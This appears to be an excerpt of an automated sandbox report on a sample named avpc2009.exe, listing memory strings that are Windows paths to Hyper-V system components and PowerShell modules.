          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177;_-
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4884\*-gd-
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0i
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144#jv
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b86157c795a73n
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63K
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44B
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2.J9
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841dddoe"
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3Yd0
          Source: avpc2009.exe, 00000019.00000003.645751546.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638786570.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639617349.0000000003A9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\assembly\GAC_MSIL\System.AddIn.ContractHyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b?HV
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5%^?
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05a5382f\*^e1
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385Nj
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565966d5f8cf2^
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2i
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841dddBY
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21Q_
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ffe6a\*
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144,
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c514a12c1\*nd!
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503
          Source: avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.687092295.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.606856071.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.641209672.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb
          Source: avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.693897519.0000000003B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.00F01FEC
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21Ie
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44y
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6
